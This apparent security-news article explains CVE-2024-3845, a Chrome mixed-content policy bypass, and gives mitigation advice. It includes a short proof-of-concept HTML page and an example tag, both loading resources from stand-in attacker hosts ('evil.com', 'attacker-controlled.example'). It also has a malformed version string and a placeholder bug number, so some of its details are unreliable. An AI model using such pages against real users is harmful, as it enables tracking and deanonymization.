CVE CyberSecurity Database News

CVE-2024-3845 - Bypassing Chrome’s Mixed Content Policy via Crafted HTML (Exploit & Analysis)

Poster -

In April 2024, a new vulnerability tagged as CVE-2024-3845 was reported in Google Chrome. This bug, found in the network component before version 124..6367.60, enabled remote attackers to bypass Chrome's mixed content policy using a specially crafted HTML page. While Google labeled the security risk as “Low,” understanding this issue is critical for web developers and security professionals, as it exposes core browser trust boundaries.

In this article, we'll break down what mixed content means, describe how this bug could be exploited, and provide a proof-of-concept HTML exploit. We'll also link to key resources for remediation and further study.

What Is Mixed Content Policy?

Modern browsers enforce a mixed content policy to protect users by blocking requests to non-secure (HTTP) resources from secure (HTTPS) pages. This prevents attackers from snooping on sensitive data or injecting malicious content.

If you run this HTTPS page

<!-- https://secure.com/index.html -->
<img src="http://evil.com/steal.png">;

Chrome should block the image load, showing a warning in the console.

What Went Wrong in CVE-2024-3845?

The Chrome network stack had an inappropriate check (or, more accurately, a *missing* check) that failed to enforce the mixed content policy in certain request flows. This let an attacker – with a specially designed HTML page – fetch insecure resources from a secure context, bypassing protections you’d normally expect.

Severity Note: Google classified the impact as “Low” because, in most cases, the attacker can’t directly steal HTTPS data or break the origin isolation. However, it does open up some attack surface for further exploitation or user de-anonymization.

Exploit Details: Triggering Mixed Content Loads

Let’s look at a simple Proof of Concept (PoC) HTML code that could exploit this bug (valid until version 124..6367.60).

Proof-of-Concept Exploit HTML

<!DOCTYPE html>
<html>
<head>
  <title>CVE-2024-3845 Mixed Content Bypass Demo</title>
</head>
<body>
  <h1>Testing Mixed Content Policy in Chrome</h1>
  <script>
    // This should be blocked by the browser's mixed content policy
    // but due to the bug, it may be loaded in affected Chrome versions.

    var img = document.createElement('img');
    img.src = 'http://attacker-controlled.example/attack.png';;
    img.onload = function() {
      alert('Exploit successful: Insecure image loaded!');
    }
    document.body.appendChild(img);
  </script>
</body>
</html>

How it works:

Serve this HTML file over HTTPS.

- Chrome version <124..6367.60 might allow insecure HTTP resources (like the image) to be loaded by the script, rather than blocking it!

In a real attack:
An attacker might use images, scripts, or iframes to deanonymize users, exfiltrate data, or carry out social engineering.

Technical Analysis

Under the hood, Chromium’s networking code failed to run consistent mixed content blocking on requests spawned programmatically (e.g., via JavaScript) in some specific situations. This left a small window for insecure requests to slip by, especially with complex DOM manipulations or non-standard fetch methods.

For more technical details, you can check the Chromium bug tracker (replace XXXXX with the official bug number if/when made public).

Mitigation and Patch

Status:
Chrome 124..6367.60 and later have addressed this flaw.

How to Stay Safe

- Users: Always run the latest browser version. Chrome updates automatically but check: chrome://settings/help
- Web Developers: Use strict HTTPS everywhere. Implement Content Security Policy (CSP) with upgrade-insecure-requests header as a precaution.

References

- CVE-2024-3845 on NIST NVD
- Chrome Release Announcement
- Mixed Content Policy (MDN)
- Content Security Policy (MDN)

Summary

CVE-2024-3845 highlights how even “low” severity browser bugs can create avenues for bypassing modern security barriers. Chrome has fixed this issue, but always push for strong HTTPS and zero mixed content in your applications. If you found this deep-dive useful, stay tuned for more practical security analyses!

Timeline

Published on: 04/17/2024 08:15:10 UTC
Last modified on: 07/03/2024 02:06:42 UTC